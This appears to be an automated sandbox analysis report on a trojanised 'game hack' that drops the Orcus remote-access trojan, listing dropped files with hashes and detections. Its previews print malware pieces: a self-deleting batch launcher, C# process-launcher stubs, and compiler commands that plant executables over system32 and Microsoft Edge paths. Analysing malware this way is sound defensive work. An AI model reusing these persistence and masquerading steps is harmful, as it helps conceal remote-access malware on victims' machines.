                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\S
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):203
                                    Entropy (8bit):5.206042731284723
                                    Encrypted:false
                                    SSDEEP:6:hCRLuVFOOr+DE1cNwiaZ5qWQNSKOZG1cNwi23fa:CuVEOCDEVNHelZS
                                    MD5:1B5342C9133EB989645D6702CED86B99
                                    SHA1:35DD90291AAB3A0AB143A852052B31DC1C3FCE11
                                    SHA-256:31A905447AF3B378382AEB8EADDCE71F849C79B80B666B327D814C51CBCB18C9
                                    SHA-512:C54126CC9F2B825A4EEF92B6AE2F0394D2888AEEBB894530420464B248B240CB3C481E92E650C4108B64F1470E8670C41135C07B2EA8F07DB9FB1F96FD955314
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\B2ESObyLKs.bat"
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.373660689688184
                                    Encrypted:false
                                    SSDEEP:3:aoMN7j2n:azNm
                                    MD5:C31A73D77A645596C8C0C5BD25FBCE95
                                    SHA1:EA1AE4703C842EF994DDB2919A93C6C7E833BDB6
                                    SHA-256:0A3056B6FBCF1A74917016EE44D313DC972FFCECC4D74E819553D63E64E3C728
                                    SHA-512:B6104AB24853A0DF821DA634E9DBD7306D556F648A02A324A90F1751010851920F5F55DCD65853948CF30C26AF1B81F54348B7F71C939412FD8798252A34B34D
                                    Malicious:false
                                    Preview:wYYkTyYPDthxghRbLSciWjpm0
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f4, 10 symbols, created Mon Jan 13 13:37:57 2025, 1st section name ".debug$S"
                                    Category:modified
                                    Size (bytes):1964
                                    Entropy (8bit):4.655589791378944
                                    Encrypted:false
                                    SSDEEP:24:HFO9MLzlur12ZHJwKtYN0lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+QEgcN:9LzK12ZSKtYilmuulB+hnqXSfbNtmhZN
                                    MD5:7E449E806888B37585DB839EE970588F
                                    SHA1:0CA333DC3448E947F7FC60DE477D8ECEBEFDD045
                                    SHA-256:E4D00D3DEAD6E72EE2B89A17CF4CAF8AB35EF7BEE9EE2C14AADE6FC93A08C486
                                    SHA-512:39903345155F436B695B728D69049E1E4F93D5F737E311A26252AF9B99C1951A0DDC34E9C4C91281A133367E2CEEC0BAC6193CBA3C143427782452C26A0F82B3
                                    Malicious:false
                                    Preview:L...5..g.............debug$S........|...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                    Category:dropped
                                    Size (bytes):386
                                    Entropy (8bit):4.941748372658632
                                    Encrypted:false
                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLRG3CaiFkD:JNVQIbSfhV7TiFkMSfhNG3C7FkD
                                    MD5:677FF7FC60E0311D7BEBBFCD555EA45B
                                    SHA1:FBF5D7395C233F6973ECA1F27E3C4B471A697884
                                    SHA-256:FE95F14C41F068E5402BBC46B16E222EBB7EC4530A8CCCAE853AB07D704A7F4F
                                    SHA-512:EFCFF575D8769F1F201D05D03E8D3A9E253D98659E9BF9761705ADE93BBC29A65DE941E937AC54DAA83949AE44A5AF34BEFE713D7658B6CEFA56FBF1450C96DE
                                    Malicious:false
                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\Cursors\OfficeClickToRun.exe"); } catch { } }).Start();. }.}.
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                    Category:dropped
                                    Size (bytes):254
                                    Entropy (8bit):5.083477818572139
                                    Encrypted:false
                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23fN1:Hu7L//TRq79cQlZl1
                                    MD5:084AA95F6933D853DA06FDD9EFB16784
                                    SHA1:45BF016B972D1F7B115C1B96BB04E80810AA0588
                                    SHA-256:A6BEA0A36EF963DFF7A410C5671B3CA76B234F27BD45DC8F5F54F2FEDA0D998A
                                    SHA-512:90BE0B422B7C24FFE3EFD82A17BEA3C63F14650EEAEB43B748298D0F7410E17F53EB433BCA994304E49F9C55C33AA4E6CE1240E0DA7351DDCDC083A2CC693337
                                    Malicious:false
                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\p3fkpuzh\p3fkpuzh.0.cs"
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (367), with CRLF, CR line terminators
                                    Category:dropped
                                    Size (bytes):788
                                    Entropy (8bit):5.2551640754922175
                                    Encrypted:false
                                    SSDEEP:24:K6MI/un/Vq79tDlQKax5DqBVKVrdFAMBJTH:GN/VqvlQK2DcVKdBJj
                                    MD5:B483897516926B5A6AD964D1F33B7975
                                    SHA1:3BFAA3F9E175E9A04C6EF7526EC9280418BE8E01
                                    SHA-256:170CAF303BC6B1CE5A49363BD0D108F66661E970FDCBDE945FC8E9A41F4CA09E
                                    SHA-512:1251BC9EC169DD5BBCA446B3D7CA300B91CB27C077FFF66C5FC38E16A93AA863C94A660161F967EC8C7857CC0759C1CD2E500308149E4C1D38198E12CE6326B3
                                    Malicious:false
                                    Preview:.C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\p3fkpuzh\p3fkpuzh.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                    Category:dropped
                                    Size (bytes):401
                                    Entropy (8bit):4.985747666306943
                                    Encrypted:false
                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLRG3CaiFkD:JNVQIbSfhWLzIiFkMSfhNG3C7FkD
                                    MD5:12552046D9C691F65E599B72940FF422
                                    SHA1:075333799460BCD79972E8F7F2984336AD5DC464
                                    SHA-256:BDEA88854255AAF8A2BE528CFB5B3157296E3D631D5E981F8108107FC2BFA80F
                                    SHA-512:6369B25FE8E1F19B42EDD52B2ADA2C655F65A9EA8DC86BF63E084761886FF95686BDEBC80B91B1FB9A2C1CD374208692F70B529B5DCC856E2F6F9D0823C3F566
                                    Malicious:false
                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\Cursors\OfficeClickToRun.exe"); } catch { } }).Start();. }.}.
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                    Category:dropped
                                    Size (bytes):269
                                    Entropy (8bit):5.161485678278323
                                    Encrypted:false
                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23fek:Hu7L//TRRzscQlZv
                                    MD5:593290488BBC0526577C37D2D68613E4
                                    SHA1:84ABE39A0CFBC71EEB537C7B4E207E1D5535151B
                                    SHA-256:5C487C4B5E96E632F3F46048AA32331494A541CE33F9147AF4A9A0516033634B
                                    SHA-512:D560CB667CF24449B958F02C6B8580422093100D42510223744FA84DCC867B7717D1FCE99CA0C0C761B51B866A22DBCB356377AF49CED830B2037E8EB1451915
                                    Malicious:true
                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.0.cs"
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (382), with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):803
                                    Entropy (8bit):5.26321617656191
                                    Encrypted:false
                                    SSDEEP:24:K6MI/un/VRzstDWKax5DqBVKVrdFAMBJTH:GN/VRzEWK2DcVKdBJj
                                    MD5:6C62C88DCBF883B3EDB57F6FC1D821DB
                                    SHA1:116A73EDA08E4C56D9D6C9F5CED52A28062C028E
                                    SHA-256:16CB84217DBA20C9DE981A5EDB6EBF15B54CFED38E9F9BA23FF1589A039F986C
                                    SHA-512:DFF1FD1231A3F4A3ADE3C92629943384BC32A9E7738727E4AC67B76956028DCB6E95D2E78EB4F5C1989DABEFFE9D7B47233414467BCB39A07654CA605BD5FAC8
                                    Malicious:false
                                    Preview:.C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with very long lines (458), with no line terminators
                                    Category:dropped
                                    Size (bytes):458
                                    Entropy (8bit):5.833704538744277
                                    Encrypted:false
                                    SSDEEP:12:FSeR3ioyA21Zm/nXjDjL2bnSrFPJf6Du1L/j/4Tr7bk:QeglBZm/nXjKbSBP4wL/jQTr7I
                                    MD5:7CC7B26756157C92F40257A8A733E8F4
                                    SHA1:72505C8DA0C79F0694292534E5B14820AAB9B469
                                    SHA-256:32E8F10ACD40A6FE81BE1EFD95B36BE2F508ABABAEF99BC97336671547D23082
                                    SHA-512:0978B7F90734FDDEDBD4E4918343E4A853230AB91E462BE0722BDD0A85E82AFF7269D6ED8E53E8A26A40E896AE07E0B739336FC67EE863708581982ADC5C419F
                                    Malicious:false
                                    Preview:DXev6IF8ogjZsQER8DOCauOPPsYF51TVAtLdHmevWlG3uVFd7SuFyJBSIOgNt9DxNOY9ElKVicqznUe3m5ImHNg1s3U2GRCWhTpg6GZWHYgWdMpxumly1bqAshRLQRPRaTRTp87ffvesqJYgNhIepNfGnpxZzNG0JO6K4VIvpFSF67TiJu7tJumMxKq9KhqSpojcNNl2YXzk5ZKpVPPEPWqYmuWuoJkHZAaRX1U5JFUw5BRXAAn5SlCS8Lzd10NPwrL492Re4U4JB4clc8uofozx8HTMB1ES2F9O0WYHtJA7q2QEtOA2GiuH2X61jFcCQmQ64OuFkm4Vo1HF1Pdx0LLTV2Vcaghnq7rElUJed4SdoYdBQ09UmpMEa6kC2RpDFRpqJCdhF8T62sp7YUMjgNBBvmootHmMPPYXsx1NWcOnVPLsRmniFFg1Pn4gYzx7WHqnTSPkd8
                                    Process:C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):104
                                    Entropy (8bit):5.148764152109411
                                    Encrypted:false
                                    SSDEEP:3:qzL10zJhC/ae/zsAHhQLgW7saXj9WQN1VBUn:qP+lhCnhBQpXj9WQNxU
                                    MD5:FBEF3B76368E503DCA520965BB79565F
                                    SHA1:9A1A27526B8B9BDAAE81C5301CD23EB613EA62BA
                                    SHA-256:BCB2AF67A4EA1E6AA341CF3141941DBE7B17F1911E7F20ABA46552571F99C9F3
                                    SHA-512:2B99BC9A945B6D9A2C0D3206DCE9221EB7F4A2040C5096909D60C3278254C52B39A28DD18DD4E005EFF0EBD7E7CBA6DD3A6A94EA8A7D7598DA3001DA174DB3F5
                                    Malicious:false
                                    Preview:%jzOvzdselMnn%%jIqPQVldutsgTz%..%ZiNfvZVusnY%"%AppData%\WinRuntimePerfMonitor/runtimesvc.exe"%UYoWwdhRT%
                                    Process:C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):1700533
                                    Entropy (8bit):7.0902455625657685
                                    Encrypted:false
                                    SSDEEP:49152:ubA3j1Tyr7ulSPsGq3xVeJNFsZeru6hS3:ube2rylSPsGIuJH1thS3
                                    MD5:BC7804FCA6DD09B4F16E86D80B8D28FA
                                    SHA1:A04800B90DB1F435DD1AC723C054B14D6DD16C8A
                                    SHA-256:1628864AB0BAFE8AFEA2AD70956B653550DAB3DB7C4CDF6F405E93A6C2441DCE
                                    SHA-512:7534AC0A215F02AF85BDF2B414E23FACE0570943F8820E7BFE97EA274CCD1A01618556E93B7465C2D9FBB0BCDE5E97FAB9E9B6BDDD366554277EF308CDE3A83C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 66%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@..........................@............@......................... ...4...T...<....0..........................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h".......$..................@..B........................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):3115520
                                    Entropy (8bit):7.863824279295955
                                    Encrypted:false
                                    SSDEEP:49152:43X27p1EZKMnkmWg8LX5prviYDyKS5AypQxbRQAo9JnCmpEu/nRFfjI7L0qb:4WHTPJg8z1mKnypSbRxo9JCm
                                    MD5:10E817A4D5E216279A8DE8ED71C91044
                                    SHA1:97C6FB42791BE24D12BD74819EF67FA8F3D21724
                                    SHA-256:C60F74F6E164049E683A5F01B8CFEA24AA85CBF6C7B31B765CBAD16D8AB0D7B2
                                    SHA-512:34421A517F5F1909AFD694D24E22CAFAD9930725DF964BA9C80666E9F0F2DCFDD2A254DCF6699E5797296EC3AE611593563779DF05E3A617C7F8679A154DFD37
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: Joe Security
                                    • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: RAT_Orcus, Description: unknown, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: ditekSHen
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 84%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.d.................p/.........../.. ........@.. ......................../...........`.................................L./.O...../......................./...................................................... ............... ..H............text....o/.. ...p/................. ..`.rsrc........./......r/.............@..@.reloc......../......./.............@..B................../.....H.......xk*..#.............0.'..........................................(....*6.(.....(....*R..(.....{....o....&*z.,..{....,..{....o......(....*....0..V............(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....(.....{.....o.....{...... ....s....o.....{....r...po.....{.....S..s....o.....{.....o.....{....r...po.....{.....o.....{.....o.....{....r!..p"..@A...s....o.....{.....) .... ....(....o.....{........s....o.....{....r3..po.....{.... ......s..
                                    Process:C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                    File Type:MS-DOS executable PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                    Category:dropped
                                    Size (bytes):4796928
                                    Entropy (8bit):7.999957858848529
                                    Encrypted:true
                                    SSDEEP:98304:s61/dl9EOCUWXid3GVg3T+QOov7ASFoSQXz0xfmxg99O4LvFLuPkNv:s8/vWOCFidWo+QOovFFoJXz0Bt99OGvH
                                    MD5:E8C32CC88DB9FEF57FD9E2BB6D20F70B
                                    SHA1:E732B91CD8AC16FA4CE8AD9E639BF21D69F6BB45
                                    SHA-256:F787CE198538B1C0B2BFCE8CE5297E34152CF6DEEBE559DF6887F65C72A081A4
                                    SHA-512:077307D42438F2B72D62CE9E35C67C09E1375C2E203E6D6D455C6C8861C6442B3D82F1345B6C76940F5E8015FE93491158A59B102FABD139C742D75C2C42BA7A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 58%
                                    Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d...........&...."......"...........0........@..............................@............ ... ..............................................0................k.....................................................................(0...............................MPRESS1. .......$I......................MPRESS2.....0.......&I....................................................................................................................v2.19..`#I. ...........p:...y..W....k].K@e>J..|U.x+I...Rs.H..g}...<(d@;..wyzf.P..8..k'..0._k..l.....og..........f....K...c....<.*k..K..5..h..=&...I....C5!D.,...|..7h.........t9I..P..0B8..'mt..M.....<&P...e.....R{.0.M...p..r.}.|.=J.V..JR.....BG.w:0(AI'.......?)<*3.]..E..U.O..Jp.."..!.8s..+.d8x).d.....<..Qf.T.I..?,.S..Y.q.T......$.~s#.Q...-..U...].....>..Z&Iv.....Z[.;pnu\......r)V".a.QX^OC..?. Q...C}:2.Q.....w...^Y~.Z.tw/;..i;6>..>;5y..9....k.....l..U.}/x=.z.,4U(..
                                    Process:C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):263
                                    Entropy (8bit):5.990912287621547
                                    Encrypted:false
                                    SSDEEP:6:GWwqK+NkLzWbH9WF08nZNDd3RL1wQJRZ7tUAKh9s4U/LKVShDwPtxs:GbMCzWL74d3XBJr7shW/qqwPtxs
                                    MD5:A05E26D89C5BE7E2C6408B09CD05CF74
                                    SHA1:C24231C6301F499B35441615B63DB6969A1762FD
                                    SHA-256:05628DFFF22E15B219A711CF52A2C87521170853979F00FCD014CF164656418E
                                    SHA-512:8C8733F12DD71CFAFD2EDBFAD487279D6ED971EB119B1CDE92A905F4658A9B090F831F42EF2228A4F6C64071A1F54FB74708438B4361E317E36016897577913D
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:#@~^7gAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]zqk.]E.Yr:.nn.6HW.rYKDzJ9C9DYGtXcJ/sWCYgt\.\9GqX2hnX|.o!U8.)onymN\HZno..Bp5wtOj6.c8lDJ~,TSP6l^/n/k0AAA==^#~@.
                                    Process:C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                    Category:dropped
                                    Size (bytes):569844
                                    Entropy (8bit):7.487969174812562
                                    Encrypted:false
                                    SSDEEP:12288:7GBfAoq+6b7AaSxWtkmtoIg132s/q3DMJGk58qgd/t:7mApDuWAt2F3xwk9t
                                    MD5:00C4245522082B7F87721F9A26E96BA4
                                    SHA1:993A8AA88436B6C62B74BB399C09B8D45D9FB85B
                                    SHA-256:A728F531427D89C5B7691F989E886DF57D46F90D934448E6DABF29D64D0662BF
                                    SHA-512:FDD8D2444B28883FACE793F6EA77913C2096A425E6101202536EA001C3DF5E76A60A01673EE7A52EAE827A12299B2727002895395315DB190EC82AE11A68559F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):3115520
                                    Entropy (8bit):7.863824279295955
                                    Encrypted:false
                                    SSDEEP:49152:43X27p1EZKMnkmWg8LX5prviYDyKS5AypQxbRQAo9JnCmpEu/nRFfjI7L0qb:4WHTPJg8z1mKnypSbRxo9JCm
                                    MD5:10E817A4D5E216279A8DE8ED71C91044
                                    SHA1:97C6FB42791BE24D12BD74819EF67FA8F3D21724
                                    SHA-256:C60F74F6E164049E683A5F01B8CFEA24AA85CBF6C7B31B765CBAD16D8AB0D7B2
                                    SHA-512:34421A517F5F1909AFD694D24E22CAFAD9930725DF964BA9C80666E9F0F2DCFDD2A254DCF6699E5797296EC3AE611593563779DF05E3A617C7F8679A154DFD37
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: Joe Security
                                    • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: RAT_Orcus, Description: unknown, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
• Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: ditekSHen
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 84%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):357
                                    Entropy (8bit):5.044876050355283
                                    Encrypted:false
                                    SSDEEP:6:TMVBd1IffVKNC7VJdfEyFRdSC7VrfC7VNQfC7VOVx/OfEyFRfyruUuAW4QIT:TMHdG3VOcrdS+QmafyV93xT
                                    MD5:A2B76CEA3A59FA9AF5EA21FF68139C98
                                    SHA1:35D76475E6A54C168F536E30206578BABFF58274
                                    SHA-256:F99EF5BF79A7C43701877F0BB0B890591885BB0A3D605762647CC8FFBF10C839
                                    SHA-512:B52608B45153C489419228864ECBCB92BE24C644D470818DFE15F8C7E661A7BCD034EA13EF401F2B84AD5C29A41C9B4C7D161CC33AE3EF71659BC2BCA1A8C4AD
                                    Malicious:true
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. <supportedRuntime version="v4.0.30319" sku=".NETFramework,Version=v4.0,Profile=Client" />.. </startup>..</configuration>
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):48
                                    Entropy (8bit):4.256328385912463
                                    Encrypted:false
                                    SSDEEP:3:B9lcTBtGQv0X+MpAEn:BMttfGn
                                    MD5:2FA8DECC3DAFE6F196F6C28769192E7C
                                    SHA1:69F4E0CF41B927634A38B77A8816CA58C0BFB2DE
                                    SHA-256:7E40EB542D164397C0BF17A47C8F0DB79E7028299E9F180D38505220FD2CFB30
                                    SHA-512:C9FB6C2AC2441FF14673CCAA3F1D5E703356C093353992D302D34DF6C9E26A85ABA6760C3B98F0CD0ADA45183C55B2E5CABC09978CA084077DD71743CA9FDBC1
                                    Malicious:false
                                    Preview:"%AppData%\chainReviewdhcp\containerRuntime.exe"
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
